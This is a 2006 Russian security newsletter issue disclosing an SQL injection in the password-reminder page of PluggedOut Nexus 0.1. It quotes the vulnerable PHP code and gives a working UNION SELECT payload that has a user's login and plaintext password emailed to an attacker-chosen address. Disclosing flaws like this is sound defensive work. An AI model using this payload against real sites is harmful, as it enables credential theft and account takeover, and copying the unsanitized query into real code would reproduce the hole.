Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в PluggedOut Nexus. (comp.paper.supuser) : Рассылка : Subscribe.Ru

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в PluggedOut Nexus.

IT-безопасность в быту и не только

Рассылка закрыта

Статистика

Отправляет email-рассылки с помощью сервиса Sendsay

При закрытии подписчики были переданы в рассылку "Безопасность. Статьи, новости, комментарии" на которую и рекомендуем вам подписаться.

Вы можете найти рассылки сходной тематики в Каталоге рассылок.

← Март 2006 →
	1 01.03.2006 07:05:18 11:05:28 16:05:20	2 02.03.2006 07:05:13 11:05:11 12:05:15 16:05:10 17:05:05	3 03.03.2006 07:05:19 11:05:24 17:05:06	4	5
6	7 07.03.2006 07:07:52 12:05:11 17:05:05	8	9 09.03.2006 07:05:32 12:05:26	10 10.03.2006 07:05:14 12:05:15 17:05:08	11	12
13	14	15 15.03.2006 07:05:20 12:05:21 17:05:08	16 16.03.2006 07:05:11 12:05:09 17:05:09	17	18	19
20	21	22	23	24	25	26
27	28	29 29.03.2006 07:05:13 17:05:23	30	31

Автор

Forester

1.394 подписчиков
-1 за неделю

← Все выпуски →

← Март 2006 →

1 01.03.2006 07:05:18 11:05:28 16:05:20

2 02.03.2006 07:05:13 11:05:11 12:05:15 16:05:10 17:05:05

3 03.03.2006 07:05:19 11:05:24 17:05:06

7 07.03.2006 07:07:52 12:05:11 17:05:05

9 09.03.2006 07:05:32 12:05:26

10 10.03.2006 07:05:14 12:05:15 17:05:08

15 15.03.2006 07:05:20 12:05:21 17:05:08

16 16.03.2006 07:05:11 12:05:09 17:05:09

29 29.03.2006 07:05:13 17:05:23

Компьютер для продвинутых пользователей

Содержание:

PluggedOut Nexus

ПО: PluggedOut Nexus
Версия: 0.1

Уязвимость:
http://localhost/Nexus/forgotten_password.php - по этому адресу, если вы указали e-mail адрес при создании аккуанта, сервер отправляет на ваш адрес данные для восстановления аккуанта. Ввод параметров "email" в "forgotten_password.php" не санируются до использования в SQL запросе. Это позволяет использовать SQL-инъекцию.
В поле E-mail address вводим ' и жмем Send Request. Нас переадресуют на http://localhost/Nexus/site_problem.php и мы видим:
Problem with Nexus website
A problem has occurred with the Nexus website - this
was not your fault, and the administrators probably
already know about it.
Уязвимый код:
if ($_POST["submit"]!=""){
$con = db_connect();
$sql = "SELECT cUsername,cPassword,cEMailPrivate FROM
nexus_users WHERE
cEMailPrivate='".$_POST["email"]."'";
$result = mysql_query($sql,$con);
if ($result!=false){
if (mysql_num_rows($result)>0){
$row = mysql_fetch_array($result);
$from = $site_admin_email;
$to = $row["cEMailPrivate"];
$subject = "Reminder Username/Password from
".$site_long_name."";
$body = "This email has been sent following a
request for a reminder username/password in the
".$site_long_name." website.\n\n"
."Your account details are as follows;\n"
." Username : ".$row["cUsername"]."\n"
." Password : ".$row["cPassword"]."\n\n"
."If you did not request this reminder message,
please contact the ".$site_long_name." administrator
(".$admin_email.")\n";

send_email($from,$to,$subject,$body);
Использование:
Введите следующий код в поле e-mail адреса:
' union select cUsername,cPassword,'ATTACKER@EMAIL.ADDRESS' from nexus_users WHERE nUserId=1 and '1'='1
и на указанный в ATTACKER@EMAIL.ADDRESS придет пароль и логин пользователя с userID=1.

PluggedOut Nexus

Рассылка создана и ведется при поддержке Информационной сети Пермского края.
Меня можно найти: ICQ - 273214003

В избранное